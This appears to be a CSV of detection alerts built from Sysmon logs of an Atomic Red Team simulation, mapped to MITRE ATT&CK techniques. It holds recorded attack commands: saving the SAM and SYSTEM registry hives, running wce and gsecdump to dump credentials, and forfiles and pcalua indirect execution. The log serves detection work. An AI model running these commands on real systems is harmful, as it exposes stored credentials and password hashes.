0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4119 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:21.069 + 747F3D96-DD99-5D31-0000-001069A34A00 + 4080 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4117 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.211 + 747F3D96-DD95-5D31-0000-001075964A00 + 7140 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4116 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.139 + 747F3D96-DD95-5D31-0000-0010D6914A00 + 6264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.097 + 747F3D96-DD95-5D31-0000-0010B38E4A00 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.149274,2019-07-19T19:11:17.149274+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4115 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.097 + 747F3D96-DD95-5D31-0000-0010B38E4A00 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "wce -o output.txt" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.107912,2019-07-19T19:11:17.107912+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4114 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:17.016 + 747F3D96-DD95-5D31-0000-0010148A4A00 + 5476 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\cmd.exe) tried dumping credentials through commandline ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4113 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:16.975 + 747F3D96-DD94-5D31-0000-0010F4864A00 + 3920 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "gsecdump -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563549077.027188,2019-07-19T19:11:17.027188+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "gsecdump -a" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4113 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:16.975 + 747F3D96-DD94-5D31-0000-0010F4864A00 + 3920 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "gsecdump -a" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563549076.48799,2019-07-19T19:11:16.487990+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4111 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 15:11:03.652 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49744 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /user) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4110 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:07.987 + 747F3D96-DD8B-5D31-0000-001094584A00 + 5792 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1563549068.184716,2019-07-19T19:11:08.184716+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /user ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4110 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:11:07.987 + 747F3D96-DD8B-5D31-0000-001094584A00 + 5792 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /user + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4108 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:59.829 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563549052.700901,2019-07-19T19:10:52.700901+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4108 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:59.829 + 747F3D96-DD47-5D31-0000-001015874900 + 5840 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4107 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 15:09:43.301 + 747F3D96-DD37-5D31-0000-00109D4C4900 + 5632 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4B8-5D31-0000-0010A8CE0600 + 4416 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4105 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-19 14:57:52.847 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49734 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4104 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.181 + 747F3D96-DA73-5D31-0000-001061933F00 + 1724 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4103 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.056 + 747F3D96-DA73-5D31-0000-0010918F3F00 + 4092 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-DA73-5D31-0000-00106A8D3F00 + 1052 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4102 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:55.024 + 747F3D96-DA73-5D31-0000-00106A8D3F00 + 1052 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c " c:\folder\normal.dll:evil.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4100 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:54.123 + 747F3D96-DA72-5D31-0000-001056513F00 + 3680 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-DA72-5D31-0000-0010044F3F00 + 1300 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4099 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:54.080 + 747F3D96-DA72-5D31-0000-0010044F3F00 + 1300 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4098 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:53.815 + 747F3D96-DA71-5D31-0000-00101A463F00 + 6168 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4097 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:57:52.816 + 747F3D96-DA70-5D31-0000-00100E2C3F00 + 112 + C:\Windows\System32\pcalua.exe + 10.0.17763.1 (WinBuild.160101.0800) + Program Compatibility Assistant + Microsoft® Windows® Operating System + Microsoft Corporation + pcalua.exe -a C:\Windows\system32\javacpl.cpl + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 + 747F3D96-DA70-5D31-0000-001007293F00 + 608 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" 